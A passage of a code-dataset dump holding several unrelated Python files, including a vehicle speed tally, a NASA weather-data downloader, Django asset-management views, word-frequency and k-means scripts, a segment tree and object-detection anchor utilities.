0\nlight_vehicles = 0\nprivate_cars = 0\ncounter = 0\n\nwhile 1:\n speed = input(\"Next reading: \")\n if speed.upper() == \"END\" and counter == 0:\n print(\"You have not entered any speeds\")\n counter += 1\n elif speed.upper() == \"END\":\n break\n elif speed[0].upper() in (\"H\", \"L\", \"C\") and 0 < int(speed[1:]) < 100:\n speed_value = int(speed[1:])\n kph_value = speed_value * 1.609\n mph_list.append(speed_value)\n kph_list.append(kph_value)\n counter += 1\n if speed[0].upper() == \"H\":\n heavy_vehicles += 1\n elif speed[0].upper() == \"L\":\n light_vehicles += 1\n elif speed[0].upper() == \"C\":\n private_cars += 1\n if speed_value > speed_limit:\n speeders += 1\n else:\n print(\"please enter the correct format\")\n\nprint(\"Total number of vehicles seen:\", counter)\n\nheavy_percent = round((heavy_vehicles / counter) * 100, 2)\nprint(\"Number of heavy goods vehicles seen:\", heavy_vehicles, heavy_percent, \"%\")\n\nlight_percent = round((light_vehicles / counter) * 100, 2)\nprint(\"Number of light good vehicles seen:\", light_vehicles, light_percent, \"%\")\n\nprivate_percent = round((private_cars / counter) * 100, 2)\nprint(\"Number of private cars seen:\", private_cars, private_percent, \"%\")\n\nprint(\"Highest speed seen:\", max(mph_list), \"MPH\", max(kph_list), \"KPH\")\nprint(\"Lowest speed seen:\", min(mph_list), \"MPH\", min(kph_list), \"KPH\")\n\navg_mph = round(sum(mph_list) / len(mph_list), 2)\navg_kph = round(sum(kph_list) / len(kph_list), 2)\nprint(\"Average speed seen:\", avg_mph, \"MPH\", avg_kph, \"KPH\")\n\nspeeders_percent = (speeders/counter)*100\nprint(\"Speed limit violations:\", speeders, round(speeders_percent, 2), \"%\")\n","sub_path":"Assignment/Assessment_oct_v4_test.py","file_name":"Assessment_oct_v4_test.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"113113652","text":"import os, sys, time, json, urllib3, requests, multiprocessing\nurllib3.disable_warnings()\nimport numpy as np\nimport pandas as pd\n\ndef Get(Total):\n API_URL, FILE_DIR, tempLatitude, tempLongitude = Total\n API_RESPONSE = requests.get(url=API_URL, verify=False)\n JSON_RESPONSE = json.loads(API_RESPONSE.text)\n DataFrame = pd.DataFrame.from_dict(JSON_RESPONSE['features'][0]['properties']['parameter'])\n DataFrame.to_csv(FILE_DIR)\n DataFrame = pd.read_csv(FILE_DIR)\n DataFrame.to_csv(FILE_DIR,index=False,header=True)\n DataFrame = pd.read_csv(FILE_DIR)\n \n #code for horizontal formatting for csv\n \n #DataFrame.rename(columns={\"Unnamed: 0\":\"Parameter\"},inplace=True)\n #DataFrame = DataFrame.T\n #DataFrame.to_csv(FILE_DIR,index=True,header=False)\n #DataFrame = pd.read_csv(FILE_DIR)\n #DataFrame.insert(0,\"Cordinate\",str(tempLatitude)+\",\"+str(tempLongitude), True)\n #DataFrame.to_csv(FILE_DIR,index=False,header=True)\n \n #code for vertical formatting for csv\n \n DataFrame.rename(columns={\"Unnamed: 0\":\"Dates\"},inplace=True)\n DataFrame[\"Latitude\"]=tempLatitude\n DataFrame[\"Longitude\"]=tempLongitude\n DataFrame.to_csv(FILE_DIR,index=False,header=True)\nclass Operation():\n def __init__(self):\n self.processes = 10 # Please do not go more than 10 concurrent requests.\n start_date = \"20100101\"\n end_date = \"20210430\"\n parametersCustom = \"PRECTOT,RH2M,T2M_RANGE,T2M_MAX,T2M_MIN,WS50M_RANGE,WS10M_RANGE\"\n self.API_URL = r\"https://power.larc.nasa.gov/cgi-bin/v1/DataAccess.py?request=execute&identifier=SinglePoint&tempAverage=DAILY¶meters=\"+parametersCustom+\"&startDate=\"+start_date+\"&endDate=\"+end_date+\"&lat={latitude}&lon={longitude}&outputList=JSON&userCommunity=AG\"\n self.FILE_DIR = \"CSV/{serial}.csv\"\n self.tempLatitude = \"{templatitude}\"\n self.tempLongitude = \"{templongitude}\"\n self.messages = []\n self.times = {}\n def Perform(self):\n BEGIN_TIME = time.time()\n Latitude_Longitude = []\n pointsDataFrame = pd.read_csv(\"D:/JOB/GITHUB/Image-Processing/Get-Values-From-{Time}-To-{Time}-For-A-Given-Lat-Long/points.csv\", usecols=list)\n for Long,Lat,Serial in zip(pointsDataFrame['X'],pointsDataFrame['Y'],pointsDataFrame['W_GIDGID']):\n Latitude_Longitude.append([Lat,Long,Serial])\n POINTS = []\n for Latitude, Longitude, Serial in Latitude_Longitude:\n LONG_LAT_QUERY = self.API_URL.format(longitude=Longitude, latitude=Latitude)\n LONG_LAT_FILE = self.FILE_DIR.format(serial=Serial)\n TempLat = self.tempLatitude.format(templatitude=Latitude)\n TempLong = self.tempLongitude.format(templongitude=Longitude)\n POINTS.append((LONG_LAT_QUERY, LONG_LAT_FILE, TempLat, TempLong))\n MP_POOL = multiprocessing.Pool(self.processes)\n TEMP_X = MP_POOL.imap_unordered(Get, POINTS)\n DataFrames = []\n for i, DataFrame in enumerate(TEMP_X, 1):\n DataFrames.append(DataFrame)\n sys.stderr.write('\\rExporting {0:%}'.format(i/len(POINTS)))\n self.times[\"Total Script\"] = round((time.time() - BEGIN_TIME), 2)\n print (\"\\n\")\n print (\"Total Script Time:\", self.times[\"Total Script\"])\nif __name__ == '__main__':\n Operation().Perform()","sub_path":"Get-Values-From-{Time}-To-{Time}-For-A-Given-Lat-Long/mul_point_data_download_csv.py","file_name":"mul_point_data_download_csv.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"547443916","text":"'''\nCreated on 10/07/2015\n\n@author: djchr\n'''\n'''\nCreated on 04/11/2014\n\n@author: djchr\n'''\nimport serial, time, sys, math, threading\nsys.path.append(\"../api/\")\nfrom fableAPI import FableAPI \nglobal api\n\n\ndef benchmark(func, string, *args, **kwargs):\n error = 0\n t = time.clock()\n for i in range(n):\n res = func(*args, **kwargs)\n if not res: error +=1\n print(string +str(round(1000*(time.clock()-t)/n, digits)) +\" \\t\\t \"+ str(100*error/n))\n\nprint(\"Welcome to test ID!\")\napi = FableAPI()\napi.setup(1)\n\nn = 100\ndigits=2\ntestType = \"Wheel\"\nid = None\nif testType == \"Joint\":\n id = 10\nif testType == \"Head\":\n id = 16\nif testType == \"Wheel\":\n id = 30\n\nprint(\" Function \\t\\t\\t\\t Lag (ms) \\t Errors (%)\")\nprint(\"-------------------------------------------------------------------------\")\nbenchmark(api.pingDongle, \"api.pingDongle \\t\\t\\t\\t \")\nbenchmark(api.pingModule, \"api.pingModule \\t\\t\\t\\t \", id)\nbenchmark(api.setModuleRGBLed, \"api.setModuleRGBLed (ack)\\t\\t \", id, 255,0,0, ack = True)\nbenchmark(api.setModuleRGBLed, \"api.setModuleRGBLed (no ack)\\t\\t \", id, 255,0,0, ack = False)\nbenchmark(api.setModuleBuzzer, \"api.setModuleBuzzer (ack) \\t\\t \", id, 0, ack = True)\nbenchmark(api.setModuleBuzzer, \"api.setModuleBuzzer (no ack) \\t\\t \", id, 0, ack = False)\nbenchmark(api.getModuleBatteryLevel, \"api.getModuleBatteryLevel \\t\\t \", id)\n##################################JOINT SPECIFIC#########################################\nif testType == \"Joint\":\n benchmark(api.getModuleMotorPosition, \"api.getModuleMotorPosition \\t\\t \", id, 0)\n benchmark(api.getModuleMotorSpeed, \"api.getModuleMotorSpeed \\t\\t \", id, 0)\n benchmark(api.getModuleMotorTorque, \"api.getModuleMotorTorque \\t\\t \", id, 0)\n benchmark(api.setModuleMotorPosition, \"api.setModuleMotorPosition (ack) \\t \", id, 0, 0, ack = True)\n benchmark(api.setModuleMotorPosition, \"api.setModuleMotorPosition (no ack) \\t \", id, 0, 0, ack = False)\n benchmark(api.setModuleMotorTorque, \"api.setModuleMotorTorque (ack) \\t\\t \", id, 0, 0, ack = True)\n benchmark(api.setModuleMotorTorque, \"api.setModuleMotorTorque (no ack) \\t \", id, 0, 0, ack = False)\n benchmark(api.setModuleMotorMaxSpeed, \"api.setModuleMotorMaxSpeed (ack) \\t \", id, 0, 0, ack = True)\n benchmark(api.setModuleMotorMaxSpeed, \"api.setModuleMotorMaxSpeed (no ack) \\t \", id, 0, 0, ack = False)\n\n##################################HEAD SPECIFIC#########################################\nif testType == \"Head\":\n benchmark(api.getHeadModuleDistance, \"api.getHeadModuleDistance \\t\\t \", id)\n benchmark(api.getHeadModuleAccelerometer, \"api.getHeadModuleAccelerometer \\t\\t \", id)\n benchmark(api.getHeadModuleGyroscope, \"api.getHeadModuleGyroscope \\t\\t \", id)\n benchmark(api.getHeadModuleMagnetometer, \"api.getHeadModuleMagnetometer\\t\\t \", id)\n benchmark(api.getHeadModuleTemperature, \"api.getHeadModuleTemperature\\t\\t \", id)\n benchmark(api.getHeadModuleIMU, \"api.getHeadModuleIMU\\t\\t\\t \", id)\n benchmark(api.getHeadModuleADC, \"api.getHeadModuleADC\\t\\t\\t \", id, 0)\n \n\n#data = api.getHeadModuleAccelerometer(16, axis='all')\n #data = api.getHeadModuleTemperature(16)\n data = api.getHeadModuleGyroscope(16)\n \napi.sleep(1)\napi.terminate()\n","sub_path":"Robot_toolboxPy/Ismael_eclipse/Fable-master/pc-software/python/tests/benchmarkJointModule.py","file_name":"benchmarkJointModule.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"353409085","text":"from django.shortcuts import render\nfrom assets.server import *\nfrom personnel.server import *\nfrom assets.forms.form import *\nimport json\nfrom django.db import transaction\nfrom common.functions import filter_fields,build_attachment_info,compare_fields,compare_json\nfrom django.shortcuts import render, HttpResponse\nfrom personnel.templatetags.personnel_tags import *\nfrom sfa.templatetags.sfa_tags import *\nfrom django.core import serializers\nfrom common.functions import *\n\n# Create your views here.\n\ndef assets(request):\n company_id = int(request.GET.get(\"company\", 6))\n project_id = int(request.GET.get(\"project\", 3))\n query_sets = assets_db.query_assets_by_list()\n if company_id < 6:\n query_sets = query_sets.filter(company_id=company_id)\n if project_id < 3:\n query_sets = query_sets.filter(project_id=project_id)\n return render(request, \"assets/assets.html\",\n {\"query_sets\": query_sets, \"company\": company_id, \"project\": project_id})\n\ndef assets_edit(request):\n mothod = request.method\n print('mothod', mothod)\n if mothod == \"GET\":\n nid = request.GET.get(\"nid\", \"\")\n print('request', request.GET)\n if nid:\n # 更新\n query_sets = assets_db.query_assets_by_id(nid)\n assets_attach = assetsattach_db.query_assets_attachment_by_sid(nid)\n if not assets_attach:\n assets_attach = \"\"\n else:\n query_sets = {}\n assets_attach = {}\n return render(request, \"assets/assets_edit.html\", {\"query_set\": query_sets,\n \"assets_attach\": assets_attach,\n \"sid\": nid})\n else:\n ret = {'status': False, \"data\": '', \"message\": \"\"}\n print('data', ret)\n form = AssetsForm(data=request.POST)\n print(\"request.POST\", request.POST)\n if form.is_valid():\n data = request.POST\n data = data.dict()\n assets_attach = data.get(\"attach\", '')\n nid = data.get(\"sid\", None)\n assets_attach = list(json.loads(assets_attach))\n if nid:\n # 更新\n try:\n with transaction.atomic():\n # 更新收支管理\n record = assets_db.query_assets_by_id(nid)\n assets_info = compare_fields(Assets._update, record, data)\n if assets_info:\n assets_info[\"nid\"] = nid\n assets_db.update_info(assets_info)\n if assets_attach:\n # 更新附件\n att_record = assetsattach_db.query_assets_attachment_by_sid(nid)\n # 数据对比\n insert_att, update_att, delete_id_att = compare_json(att_record, assets_attach, \"said\")\n if insert_att:\n insert_att = build_attachment_info({\"sid_id\": nid}, insert_att)\n assetsattach_db.mutil_insert_attachment(insert_att)\n if update_att:\n assetsattach_db.mutil_update_attachment(update_att)\n if delete_id_att:\n assetsattach_db.mutil_delete_task_attachment(delete_id_att)\n ret['status'] = True\n ret['data'] = nid\n except Exception as e:\n print(e)\n ret[\"message\"] = \"更新失败\"\n else:\n # 创建\n try:\n with transaction.atomic():\n assets_info = filter_fields(Assets._insert, data)\n sid = assets_db.insert_info(assets_info)\n if assets_attach:\n assets_attach = build_attachment_info({\"sid_id\": sid}, assets_attach)\n assetsattach_db.mutil_insert_attachment(assets_attach)\n ret['status'] = True\n ret['data'] = sid\n except Exception as e:\n print(e)\n ret[\"message\"] = \"添加失败\"\n else:\n errors = form.errors.as_data().values()\n firsterror = str(list(errors)[0][0])\n ret['message'] = firsterror\n return HttpResponse(json.dumps(ret))\n\ndef assets_detail(request):\n id = request.GET.get(\"id\", None)\n ret = {\"status\": False, \"data\": \"\", \"message\": \"\"}\n if id:\n try:\n assets_obj = assets_db.query_assets_by_id(id)\n if assets_obj:\n # 格式化数据\n assets_json = assets_obj.__dict__\n assets_json.pop('_state')\n assets_json[\"company_id\"] = change_to_company(assets_json[\"company_id\"])\n assets_json[\"project_id\"] = change_to_project(assets_json[\"project_id\"])\n assets_json[\"assets_classify_id\"] = change_to_assets_classify(assets_json[\"assets_classify_id\"])\n assets_json[\"save_coordinate_id\"] = change_to_save_coordinate(assets_json[\"save_coordinate_id\"])\n assets_json[\"procurement_name_id\"] = change_to_procurement(assets_json[\"procurement_name_id\"])\n assets_json[\"user_name_id\"] = change_to_username(assets_json[\"user_name_id\"])\n assets_json[\"assets_status_id\"] = change_to_assets_status(assets_json[\"assets_status_id\"])\n assets_json[\"approver_id\"] = change_to_approver2(assets_json[\"approver_id\"])\n assets_attach = assetsattach_db.query_assets_attachment(id)\n if assets_attach:\n assets_json['attach'] = serializers.serialize(\"json\", assets_attach)\n else:\n assets_json['attach'] = ''\n ret['status'] = True\n ret['data'] = assets_json\n return HttpResponse(json.dumps(ret, cls=CJSONEncoder))\n except Exception as e:\n print(e)\n return render(request, '404.html')\n\ndef assets_delete(request):\n \"\"\"删除资产管理\"\"\"\n ret = {'status': False, \"data\": \"\", \"message\": \"\"}\n ids = request.GET.get(\"ids\", '')\n ids = ids.split(\"|\")\n # 转化成数字\n id_list = []\n for item in ids:\n if item:\n id_list.append(int(item))\n try:\n with transaction.atomic():\n assets_db.multi_delete(id_list)\n # 删除附件\n assetsattach_db. multi_delete_attach_by_edit_id(id_list)\n ret['status'] = True\n except Exception as e:\n print(e)\n ret['message'] = \"删除失败\"\n return HttpResponse(json.dumps(ret))\n\ndef assets_detail_1(request):\n cid = request.GET.get(\"nid\", None)\n id = 1\n if cid:\n query_sets = assets_db.query_assets_by_id(cid)\n query_set = supplies_db.query_supp_by_id(id)\n get_sets = suppliesreturn_db.query_supp_by_id(id)\n if query_sets:\n assets_attach = assetsattach_db.query_assets_attachment(cid)\n if not assets_attach:\n assets_attach = ''\n return render(request, \"assets/assets_detail.html\", {\"query_set\": query_sets,\n \"query_sets\": query_set,\n \"get_sets\": get_sets,\n \"assets_attach\": assets_attach,\n })\n return render(request, '404.html')\n\n\ndef assets_detail_2(request):\n id = request.GET.get(\"id\", None)\n ret = {\"status\": False, \"data\": \"\", \"message\": \"\"}\n if id:\n try:\n assets_obj = supplies_db.query_supp_by_id(id)\n if assets_obj:\n # 格式化数据\n assets_json = assets_obj.__dict__\n assets_json.pop('_state')\n assets_json[\"supplies_id_id\"] = change_to_supplies(assets_json[\"supplies_id_id\"])\n assets_json[\"sid_id\"] = change_to_staff(assets_json[\"sid_id\"])\n assets_attach = assetsattach_db.query_assets_attachment(id)\n if assets_attach:\n assets_json['attach'] = serializers.serialize(\"json\", assets_attach)\n else:\n assets_json['attach'] = ''\n ret['status'] = True\n ret['data'] = assets_json\n return HttpResponse(json.dumps(ret, cls=CJSONEncoder))\n except Exception as e:\n print(e)\n return render(request, '404.html')\n\n\ndef assets_detail_3(request):\n id = request.GET.get(\"id\", None)\n ret = {\"status\": False, \"data\": \"\", \"message\": \"\"}\n if id:\n try:\n assets_obj = suppliesreturn_db.query_supp_by_id(id)\n if assets_obj:\n # 格式化数据\n assets_json = assets_obj.__dict__\n assets_json.pop('_state')\n assets_json[\"supplies_id_id\"] = change_to_supplies(assets_json[\"supplies_id_id\"])\n assets_json[\"sid_id\"] = change_to_staff(assets_json[\"sid_id\"])\n assets_attach = assetsattach_db.query_assets_attachment(id)\n if assets_attach:\n assets_json['attach'] = serializers.serialize(\"json\", assets_attach)\n else:\n assets_json['attach'] = ''\n ret['status'] = True\n ret['data'] = assets_json\n return HttpResponse(json.dumps(ret, cls=CJSONEncoder))\n except Exception as e:\n print(e)\n return render(request, '404.html')","sub_path":"apps/assets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"92433476","text":"#Jason Aylward\n#January 14, 2015\n#Homework 3\n\nimport sys\n\ndef format_text(original_text):\n \"\"\"Receives a string and returns a list of acceptable words\"\"\"\n new_text = original_text.lower()\n bad_chars = [\"\\n\",\"\\r\",\"\\t\",\".\",\",\",'\"',\"?\",\"!\",\"]\",\"[\",\n \"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"'\",\n \"(\",\")\",\"@\",\"#\",\"$\",\"%\",\"^\",\"&\",\"*\",\"_\",\"+\",\n \":\",\";\",\"/\",\"http\",\"www\",\"`\",\"~\",\"--\"]\n for bad_char in bad_chars:\n new_text = new_text.replace(bad_char,' ')\n text = new_text.split(' ')\n clean_text = []\n for word in text:\n #Remove empty words and remaining s's from contractions and possessives\n if(word != \"\" and word != \"s\"):\n clean_text.insert(len(clean_text),word)\n return clean_text\n\ndef word_frequency(input_text):\n \"\"\"Receives a string\n and returns a dictionary of words and their counts\n also prints a histogramic list of the top 20 words\"\"\"\n word_list = format_text(input_text)\n dict_of_words = {}\n for word in word_list:\n try:\n dict_of_words[word] += 1\n except:\n dict_of_words[word] = 1\n analyze_dict(dict_of_words)\n return dict_of_words\n\ndef analyze_dict(dict_of_counts):\n \"\"\"Receives a dictionary of words and their word counts\n sorts the dictionary and prints the top 20 occurring words\"\"\"\n word_list = sorted(dict_of_counts.items(), key=lambda x: x[1], reverse = True)\n for x in range(0,20):\n try:\n #Cleaning up the histogram basing spaces on word-length\n if len(word_list[x][0]) <= 3:\n print(\"{}. {}: {} times \\t\\t{}\".format(x+1,word_list[x][0],word_list[x][1],histogram(word_list[x][1],word_list[0][1])))\n else:\n print(\"{}. {}: {} times\\t\\t{}\".format(x+1,word_list[x][0],word_list[x][1],histogram(word_list[x][1],word_list[0][1])))\n except:\n print(\"Sorry. There are less than twenty words.\")\n break\n print(\"\\n\")\n\ndef histogram(current,max_count):\n \"\"\"Returns string of #'s of an appropriate length\"\"\"\n normalizer = 50/max_count\n hash_string = \" \"\n count = 0\n while count < (current*normalizer):\n hash_string = hash_string + \"#\"\n count += 1\n return hash_string\n\n\n\"\"\" Start of program \"\"\"\n\nif __name__ == '__main__':\n # The top-level script is called __main__ so if a function from this\n # script is being imported, the following code will not be run\n try:\n with open((sys.argv[1])) as input_file:\n input_lines = input_file.readlines()\n except:\n with open(\"sample.txt\") as input_file:\n input_lines = input_file.readlines()\n\n #join all the lines of text by \" \"\n input_string = \" \".join(input_lines)\n dict_of_words = word_frequency(input_string)\n","sub_path":"word_frequency.py","file_name":"word_frequency.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"535756376","text":"import re\nimport numpy as np\nimport sqlite3\nimport requests\nfrom typing import *\nfrom connection import DB_connection\nfrom utils import load,save\n\ndef connection(mess:str) -> dict:\n data = {\n \"message_id\": \"b2831e73-1407-4ba0-a861-0f30a42a42a2a5a\",\n \"text\": mess,\n \"sender\": \"user\"\n }\n r = requests.post(url = \"http://localhost:5005/model/parse\", json = data, headers={'Content-Type': 'application/json'}) \n data = r.json()\n return data\n\ndef databaseRequest(name:str, conversension: dict) -> tuple:\n con = DB_connection()\n sentence = \"SELECT count(id) FROM \"+ name + \";\"\n con.cursorObj.execute(sentence)\n amountOfData = con.cursorObj.fetchone()[0]\n print(amountOfData)\n if amountOfData == 0:\n req = validationConversations(conversension)\n save(name,req['dist'])\n result = req\n con.sql_insert_rate(req[\"fail\"], req[\"success\"],name)\n for intentcion,data in zip(req[\"names\"],req[\"data\"]):\n print((intentcion,data))\n con.sql_insert((intentcion,data),name)\n return result\n else:\n sentence = \"select name,data from \" + name + \";\"\n con.cursorObj.execute(sentence)\n rows = con.cursorObj.fetchall()\n intentions = []\n confiances = []\n for intention,confiance in rows:\n intentions.append(intention)\n confiances.append(confiance)\n sentence = \"select fail,success from rate where conversation='\"+name+\"';\"\n #print(sentence)\n con.cursorObj.execute(sentence)\n obj = con.cursorObj.fetchall()[0]\n #print(obj)\n return {\n \"names\":intentions,\n \"data\":confiances,\n \"fail\":obj[0],\n \"success\":obj[1],\n \"dist\":load(name)\n }\n\ndef validationConversations(data:dict) -> dict:\n x1 = []\n y1 = []\n dist = {}\n succes = 0\n fail = 0\n for conv in data.keys(): \n list_values = []\n x1.append(conv)\n for example in data[conv]:\n awnser = connection(example)\n #print(awnser)\n dist[awnser['intent']['name']] = {\n \"intentions\":[i['name'] for i in awnser['intent_ranking']],\n \"pred\":[round(i['confidence'],5) for i in awnser['intent_ranking']]\n }\n if re.sub(r'-\\d','',conv) == awnser['intent']['name']:\n succes += 1\n list_values.append(round(awnser['intent']['confidence'],2))\n else:\n #print(awnser)\n #print(\"Label: \", conv, \"Awnser:\", awnser['intent']['name'], \"with\", example)\n fail += 1\n list_values.append(0.0)\n y1.append(np.mean(list_values))\n return {\n \"names\":x1,\n \"data\":y1,\n \"fail\":round(100*fail/(fail+succes)),\n \"success\":round(100*succes/(fail+succes)),\n \"dist\":dist\n }\n\ndef delete_table(name:str):\n con = DB_connection()\n con.sql_delete_table(name)","sub_path":"wedPage/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"295970599","text":"import math\nfile_input = open(\"input.txt\",\"r\")\nk = int(file_input.readline().strip())\ntran=[]\n\nwhile True:\n line = file_input.readline().strip()\n if not line:\n break\n l=line.split(\",\")\n tran.append(l)\n\nprint (tran)\n\ndef dist(p1,p2):\n res=0\n for i in range(len(p1)):\n res += math.pow(float(p1[i])-float(p2[i]),2)\n\n final_res = math.sqrt(res)\n return final_res\n\ndef clusters(data,centroids):\n l1= dict() #for maintaining the distance corresponding to each cluster\n l2=dict() #for storing the points in corresponding cluster \n for i in range(len(centroids)):\n l2[i]=[] #value is going to be a list\n for i in range(len(data)):\n p1 = data[i] #take one point at a time\n for index in range(len(centroids)): #compute the distance of that one point with all the clusters \n p2= centroids[index] \n d = dist(p1,p2)\n #print(d)\n l1[index]=d\n \n res = min(l1.values())\n #print(\"min\",res)\n for key,value in l1.items():\n if value == res:\n kk = key\n l2[kk].append(i)\n print(l2)\n return (l2)\n\ndef mean(l2,tran):\n centroids=[]\n tmp=[]\n for key,values in l2.items():\n l=values\n x1=0\n for j in range(len(tran[0])):\n x1=0\n for k in range(len(l)):\n p=tran[l[k]]\n x1 +=int(p[j])\n x1=x1/len(l)\n tmp.append(x1)\n centroids.append(tmp)\n tmp=[]\n print(\"New Centroids:\",centroids)\n return (centroids)\n \n \n\ncentroids = tran[0:k]\nprint(centroids)\nold = centroids\nnew = None\nwhile True:\n old = centroids\n l2=clusters(tran,centroids)\n centroids = mean(l2,tran)\n new = centroids\n if (new == old):\n break\n \n\n \n","sub_path":"my_kmeans.py","file_name":"my_kmeans.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"45396504","text":"class Intervalac:\n\tdef __init__(self, lst):\n\t\tself.size = self._get_size(lst)\n\t\tself.lst = [0] * self.size + lst + [0] * (self.size - len(lst))\n\t\tself._create(len(self.lst))\n\n\tdef _create(self, n):\n\t\tfor i in range(n-2,0,-2):\n\t\t\tself.lst[i//2] = self.lst[i] + self.lst[i+1]\n\n\tdef _get_size(self, lst):\n\t\tn = 1\n\t\twhile n < len(lst):\n\t\t\tn *= 2\n\t\treturn n\n\n\tdef _get_interval(self, x, y, start, end, i):\n\t\tif x <= start and end <= y:\n\t\t\treturn self.lst[i]\n\t\tif y <= start or x >= end:\n\t\t\treturn 0\n\n\t\treturn self._get_interval(x, y, start, (start+end)//2, i*2) + self._get_interval(x, y, (start+end)//2, end, i*2+1)\n\n\tdef get(self, x, y):\n\t\treturn self._get_interval(x, y, 1, self.size+1, 1)\n\n\tdef set(self, i, val):\n\t\tindex = self.size + i - 1\n\t\tself.lst[index] = val\n\n\t\twhile index != 1:\n\t\t\tindex //= 2\n\t\t\tself.lst[index] = self.lst[index*2] + self.lst[index*2+1]\n\n\nif __name__ == '__main__':\n\tlst = [8,10,0,0,0,1,100]\n\tintervalac = Intervalac(lst)\n\tprint(intervalac.lst)\n\n\tprint(intervalac.get(1,3))\n\tintervalac.set(2, -100)\n\tprint(intervalac.lst)\n\tprint(intervalac.get(1,3))\n","sub_path":"intervalac.py","file_name":"intervalac.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"152038641","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Shiyu Huang\n# @File : utils.py\n\nimport os\nfrom PIL import Image, ImageDraw, ImageFont\nimport numpy as np\nimport random\nfrom TART.utils import get_all_files\nimport pickle\nfrom sklearn.utils.extmath import cartesian\n\n\ndef IOU(x, centroids):\n similarities = []\n\n for centroid in centroids:\n c_w, c_h = centroid\n w, h = x\n if c_w >= w and c_h >= h:\n similarity = w * h / (c_w * c_h)\n elif c_w >= w and c_h <= h:\n similarity = w * c_h / (w * h + (c_w - w) * c_h)\n elif c_w <= w and c_h >= h:\n similarity = c_w * h / (w * h + c_w * (c_h - h))\n else: # means both w,h are bigger than c_w and c_h respectively\n similarity = (c_w * c_h) / (w * h)\n similarities.append(similarity) # will become (k,) shape\n return np.array(similarities)\n\n\ndef kmeans(annotations, centroids):\n anno_number = annotations.shape[0]\n anchor_number, dim = centroids.shape\n\n prev_assignments = np.ones(anno_number) * (-1)\n\n iter = 0\n while True:\n D = []\n iter += 1\n for i in range(anno_number):\n d = 1 - IOU(annotations[i], centroids)\n D.append(d)\n D = np.array(D)\n\n assignments = np.argmin(D, axis=1)\n if (assignments == prev_assignments).all():\n print(anno_number, [np.sum(assignments == j) for j in range(anchor_number)])\n print(centroids)\n return centroids\n\n centroid_sums = np.zeros((anchor_number, dim), np.float)\n for i in range(anno_number):\n centroid_sums[assignments[i]] += annotations[i]\n for j in range(anchor_number):\n\n if np.sum(assignments == j) != 0:\n centroids[j] = centroid_sums[j] / (np.sum(assignments == j))\n else:\n centroids[j] = annotations[random.randint(0, len(annotations) - 1)]\n\n prev_assignments = assignments.copy()\n\n\ndef gen_anchors(anno_dir, class_names, save_path, max_size, anchor_number=9):\n files = get_all_files(anno_dir, '.txt')\n\n class_wh = {}\n for name in class_names:\n class_wh[name] = []\n\n for file in files:\n f = open(file, 'r')\n lines = f.readlines()\n for line in lines:\n line = line.strip()\n line_s = line.split(' ')\n class_wh[line_s[0]].append([float(line_s[3]), float(line_s[4])])\n\n miss_key = []\n\n anchor_dict = {}\n for key in class_wh:\n if len(class_wh[key]) == 0:\n miss_key.append(key)\n continue\n print('{}:'.format(key))\n annotations = np.array(class_wh[key])\n indices = [random.randrange(annotations.shape[0]) for _ in range(anchor_number)]\n centroids = annotations[indices] # centroids中是该类的annotations中随机的anchor_number个编号\n centroids = kmeans(annotations, centroids)\n\n centroids = np.minimum(centroids, max_size)\n\n anchors = centroids.copy()\n\n widths = anchors[:, 0]\n sorted_indices = np.argsort(widths)\n anchor_dict[key] = anchors[sorted_indices]\n\n for key in miss_key:\n anchor_dict[key] = anchors[sorted_indices]\n with open(save_path, 'wb') as f:\n pickle.dump(anchor_dict, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef safeInt(ss):\n return int(float(ss))\n\n\ndef get_region(im):\n size_x, size_y = im.shape[0], im.shape[1]\n x_min, x_max = -1, size_x\n y_min, y_max = -1, size_y\n for i in range(2, size_x):\n if np.mean(im[i, :]) > 30:\n x_min = i\n break\n for i in range(2, size_x):\n if np.mean(im[size_x - i, :]) > 30:\n x_max = size_x - i\n break\n for i in range(2, size_y):\n if np.mean(im[:, i]) > 30:\n y_min = i\n break\n for i in range(2, size_y):\n if np.mean(im[:, size_y - i]) > 30:\n y_max = size_y - i\n break\n return x_min, x_max, y_min, y_max\n\n\nclass BBX:\n def __init__(self, x=None, y=None, w=None, h=None, score=None, name=None):\n self.name = name\n\n self.x = x\n self.y = y\n self.w = w\n self.h = h\n self.score = score\n\n def str2bbx(self, str):\n chrs = str.split(' ')\n\n self.name = chrs[0]\n\n self.x = safeInt(chrs[1])\n self.y = safeInt(chrs[2])\n self.w = safeInt(chrs[3])\n self.h = safeInt(chrs[4])\n self.score = float(chrs[5])\n\n def str2bbx_true(self, str):\n chrs = str.split(' ')\n\n self.name = chrs[0]\n\n self.x = safeInt(chrs[1])\n self.y = safeInt(chrs[2])\n self.w = safeInt(chrs[3])\n self.h = safeInt(chrs[4])\n self.score = 1\n\n def resize(self, scale, x_d, y_d):\n self.x = safeInt(self.x * scale) + x_d\n self.y = safeInt(self.y * scale) + y_d\n self.w = safeInt(self.w * scale)\n self.h = safeInt(self.h * scale)\n\n\nclass COLOR_CONF:\n def __init__(self, names=[], default_color=(255, 0, 0), default_font_size=12, line_width=1):\n self.colors = {}\n self.names = names\n if names is not None:\n self.generate_colors(names)\n\n self.default_color = default_color\n self.default_font_size = default_font_size\n self.line_width = line_width\n\n def set_color(self, name, color):\n self.colors[name] = color\n\n def generate_colors(self, names):\n for i in range(len(names)):\n 